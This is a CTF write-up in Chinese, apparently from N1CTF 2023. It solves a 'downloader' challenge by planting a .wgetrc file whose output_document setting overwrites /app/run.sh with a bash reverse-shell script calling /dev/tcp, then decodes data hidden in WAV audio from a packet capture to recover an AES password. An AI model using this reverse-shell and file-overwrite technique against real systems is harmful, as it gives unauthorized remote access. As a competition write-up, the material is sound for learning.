downloader
搜索后发现这题考点似乎和[*CTF2022 oh-my-lotto]的非预期解相似,于是试试思路
大概就是先用downloader下载vps上托管的.wgetrc,然后.wgetrc里面是output_document可以导致文件覆盖
起了docker看一下,似乎能覆盖的不多,wget是覆盖不了的,于是转变思路,可以去覆盖/app下的pwn或者run.sh,这里选择覆盖run.sh
vps托管.wgetrc内容如下
output_document=/app/run.sh以及反弹shell的脚本
#!/bin/bash
bash -c "bash -i >& /dev/tcp/ip/port 0>&1"然后先下载.wgetrc,退出,再下载反弹shell脚本
再退出,vps监听端口,然后nc题目即可收到shell
Hidden AES Wave
流量里面一堆wav,似乎是11111和22222端口间的某种通信,直接tshark提取
tshark -r challenge.pcapng -T fields -Y "udp and \!icmp" -e udp.payload | sed '/^\s*$/d' > 1.txtcyberchef里再转一下,然后foremost得到所有的音频
audacity简单看看,里面是二进制传输数据并且每七位一个字符
直接写脚本
import os
def check(text):
for i in range(1,len(text)-1):
if(text[i-1] + text[i+1] == '{}'):
print(text[i])
def get(flag):
sig = "1"
cnt = 0
flagg = ''
text = ''
cnnt = 0
for i in flag:
if(i != sig):
sig = i
if(sig == '0'):
if(cnt == 48 or cnt == 72):
flagg+="1"
cnt = 0
elif(cnt == 16 or cnt == 24):
flagg+='0'
cnt = 0
elif(sig == '1'):
cnt = 0
cnt += 1
for i in range(0,len(flagg),7):
data = flagg[i:i+7]
text += chr(int(data,2))
print(text)
if(text.startswith('Roger!')):
#print(text)
return
check(text)
def analysis(file):
f = open(file, 'rb').read()
f = f[44:]
flag = ''
for i in range(len(f)//4):
data = f[4*i:4*i+4]
if(data != b'\x00\x00\x00\x00'):
flag += '1'
else:
flag += '0'
get(flag)
files = os.listdir('./wav')
for file in files:
analysis('./wav/' + file)得到所有信息
With re{Z}spect to now, solving secret communication is becoming a more and more significant issue, by contrasts, if secret communication takes place in our daliy life, we have to consider its consequence.
Roger!
On the one hand, the consequece of secret comm{J}unication is of great significance to me, and to many other people.
Roger!
It is disappointing that, secret communication has become increasingly evident among teens according to many scientists, alternatively, as this subjec{o}t continues to be looked down on people must realize that secret communication are becoming more common in today's world.
Roger!
It is disappointing that, as this subject continues to be looked down on people must realize that secret communication are{X} becoming more common in today's world.
Roger!
Chiefly, jacqueline Carey, kushiel{M}'s Dart concluded that, that which yields is not always weak.
Roger!
That solved my prob{M}lem.
Roger!
That is to say,{x} david Mamet mentioned that, it's only words.. unless they're true.
Roger!
Tha{K}t inspired me.
Roger!
In addition, does the government provide help for secret communication{E}? Furthermore, with these questions, let's take a closer look to secret communication.
Roger!
Since that is so, if we think about it from a different point of view, moreover, what is the key point of secret communication? In comparison{I}, for secret communication, the key point is how to express secret communication.
Roger!
In particular, rebecca West attemptted to convince the reader that, the trouble abo{x}ut man is twofold.
Roger!
He cannot learn truths which are too complicated; he forgets truths which are too{e} simple.
Roger!
Which brought a new way of thinkin{X}g it.
Roger!
In addition, what is the{5} key point of secret communication? In particular, rebecca McClanahan ,the shortest distance between two points is always under construction. Which enlighten me.
Roger!
Besides, if we think about it from a different point of view, however, under this inevitable circumstance situation, we have to solve secret comm{d}unication.
Roger!
On the one hand, to a certain extent, secret communication is right.{A}
Roger!
Another possibility is, now, solving secret communication is becoming a more and more significant issue, {E}above all, what could we do anyway to ahchieve secret communication.
Roger!
Furthermore, for many years, people with secret communication have{w} been viewed as different.
Roger!
In comparison, the problem lies in the difference of people raised by secre{8}t communication, It is disappointing that, after seeing this evidence, there is no way we can agree with secret communication.
Roger!
With respect to What is the key point of secret communication? In comparison, if secret communicati{w}on takes place in our daliy life, we have to consider its consequence.
Roger!
In fact, opponents of secret communication cl{B}aim that, in that case, we have to face an embarrassing situation, that is, another way of viewing this is, for me, the emergent rise of secret communication may change my life.
Roger!
Besides, for secret communication, the key point is how to express secret communicat{P}ion.
Roger!
In addition, what is the key point of secret communica{b}tion? However, as this subject continues to be looked down on people must realize that secret communication are becoming more common in today's world.
Roger!
To look at another wa{w}y, secret communication continues to be a relevant controversial issue in society today, as However, what should we do to give rise to secret communication, and what should we do to prevent secret communication's happening.
Roger!
Another possibility is, secret communication continues to be a relevant controversial issue in society today, as That is to say, emil Cioran ,melancholy: an appetite no misery {F}satisfies. Which enlighten me.
Roger!
Since that is so, what should we do to give rise to secret communication, and what should we do to prevent secret communic{4}ation's happening.
Roger!
By contrasts, the evidence presented in this assignment has shown that, in other words, as this subject continues to be looked down on peop{7}le must realize that secret communication are becoming more common in today's world.
Roger!
That is to say, according to Napoleon Bonaparte, if you want a thing done well, do it yourself. {X}Which enlighten me.
Roger!
With respect to what should we do to give rise to secret communication, and what sh{8}ould we do to prevent secret communication's happening.
Roger!
In comparison, if secret communication takes place in our daliy life, we have to consider its con{P}sequence.
Roger!
To look at another way, some people may disagree with secret communication, furthermore, opponents of secret communication claim that, that is to say, rebecca McClanahan showed us that, the shortest distance between two poin{0}ts is always under construction. That solved my problem.
Roger!
In addition, if secret communication takes {3}place in our daliy life, we have to consider its consequence.
Roger!
Furtherm{3}ore, when facing this difficult choice of secret communication, i rarely slept well.
Roger!
Moreover,{i} is inevitable.
Roger!
By contrasts, what is the key point of secret communication? For example, franz Kafka ,if a man has his eyes bound, you can en{I}courage him as much as you like to stare through the bandage, but he'll never see anything.
Roger!
Which brought a new way of thinking it.Chiefly, to quote from Friedrich Nietzsche, i hav{W}e forgotten my umbrella. Which enlighten me.
Roger!
However, but these are not the most urgent issue, a more pressing issue about secret communication is, furthermore, from my piont {z}of view, secret communication means a lot to me, and Moreover, as this subject continues to be looked down on people must realize that secret communication are becoming more common in today's world.
Roger!
For example, david Mamet concluded that, it's only words.. unless they're true. That inspired{i} me.
Roger!
In addition, now, solving secret communication is becoming a more and more significant issue, alternatively, se{L}veral studies of the effects of secret communication on the human systems have failed to demonstrate these effects.
Roger!
To look at another way, we generally say, if we grasped the key of the problem of secret communication, everthing else wi{I}ll be easily solved.
Roger!
Above all, for me, the emergent r{9}ise of secret communication may change my life.
Roger!
Furthermore, we hav{k}e been thinking about secret communication for a long time.With respect to In my opinion, however, several studies of the effects of secret communication on the human systems have failed to demonstrate these effects.
Furthermore, we hav{k}e been thinking about secret communication for a long time.With respect to In my opinion, however, several studies of the effects of secret communication on the human systems have failed to demonstrate these effects.
Roger!
C{Z}hiefly, rebecca West concluded that, the trouble about man is twofold.
Roger!
He cannot learn truths which a{6}re too complicated; he forgets truths which are too simple.
Roger!
That aroused my imaginatio{R}n.
Roger!
In other words, one of the longest standing arguments against the use of secret communication is that, moreover, one of the longest standing arguments against the use of secret communication is that, besides, one {K}of the longest standing arguments against the use of secret communication is that, similarly, modern vehement arguments against secret communication alone become suspect.
Roger!
Thus, as far as I know, alternatively, why does secret communication ha{K}ppen? Since that is so, for secret communication, the key point is how to express secret communication.
Roger!
Another possibility is, one of the longest standing arguments against the use of secret communication is that, on the contrary, more current stu{X}dies of people who take secret communication heavely show no evidence of emotional damage.
Roger!
In that {B}case, modern vehement arguments against secret communication alone become suspect.
Roger!
In compari{h}son, to a certain extent, secret communication is right.
Roger!
Since that is so, some people may disagree with secret communication, in fact, now, solving secret communication is becoming a more and more significant issue, to look at another way, we generally say, if we grasped the key of the problem of secret communication, everthing else will be easi{K}ly solved.
Roger!
It is important to note that but these are not the most urgent issue, a more press{l}ing issue about secret communication is, thus, after seeing this evidence, there is no way we can agree with secret communication.
Roger!
To look at another way, now, solving secret communication is {r}becoming a more and more significant issue, similarly, when facing this difficult choice of secret communication, i rarely slept well.
Roger!
In addition, what should we do to give rise to secret communication, and what {s}should we do to prevent secret communication's happening.
Roger!
For example{q}, james Thurber attemptted to convince the reader that, all human beings should try to learn before they die what they are running from, and to, and why. Which enlighten me.
Roger!
On the other hand, every person has to face these problems caused by secret communication, when facing these problems, that is to say, according to Napoleon Bonaparte, if you want a thing done well, do it {H}yourself. Which enlighten me.
Roger!
Furthermore, secret communication continues to be a relevant controversial issue in society today, as Another way of viewing this is, does the government provide help for secret communication? Above all, {+}is inevitable.
Roger!
Alternatively, now, solving secret communication is becoming a more and more significant issue, namely, to quote from Rebecca {i}McClanahan, the shortest distance between two points is always under construction.
Roger!
Which broug{3}ht a new way of thinking it.
Roger!
In fact, for many years, people{B} with secret communication have been viewed as different. In other words, is inevitable.
Roger!
Thus, secret communication has become{q} increasingly evident among teens according to many scientists, moreover, we have to face an embarrassing situation, that is, for example, kamand Kojouri concluded that, what you choose also chooses you. That inspired me.
Roger! Secret key confirmed.
It is disappointing that, but these {v}are not the most urgent issue, a more pressing issue about secret communication is, another way of viewing this is, secret communication is a common condition among civilians in today's society, so, another way of viewing this is, what should we do to give rise to secret communication, and what should we do to prevent secret communication's happening.
Roger!
For e{3}xample, to quote from Kamand Kojouri, what you choose also chooses you.
Roger!
Which br{T}ought a new way of thinking it.
Roger! Encrypted text and secret key confirmed.
Roger! Encrypted text and secret key confirmed.
Roger! Encrypted text and secret key confirmed.并且每句话里面都有一个{}包起来的base64字符,这个脚本里也提取了
ZJoXMMxKEIxeX5dAEw8wBPbwF47X8P033iIWziLI9kkZ6RKKXBhKlrsqH+i3Bqv3T但是注意到里面有一段是发送了两个k但是只有一个Roger!,所以需要舍去一个k,可能是某些神秘问题
所以密文应该是
ZJoXMMxKEIxeX5dAEw8wBPbwF47X8P033iIWziLI9kZ6RKKXBhKlrsqH+i3Bqv3T由于我是foremost拿到的wav所以文件尾是没有隐写的,这里卡了挺久,但是tshark的结果里有,由于RIFF头前面还有五个字节的奇妙数据,所以再往前读一个就好了,直接写脚本提取
import string
f = open('download.dat', 'rb').read()
for i in range(len(f)-4):
if(f[i:i+4] == b'RIFF'):
if(chr(f[i-6]) in string.printable):
print(chr(f[i-6]),end='')直接拿到密码
P@$Sw0rd1!Y0uGot解aes即可
welcome to N1CTF 2023
feedback
直接填
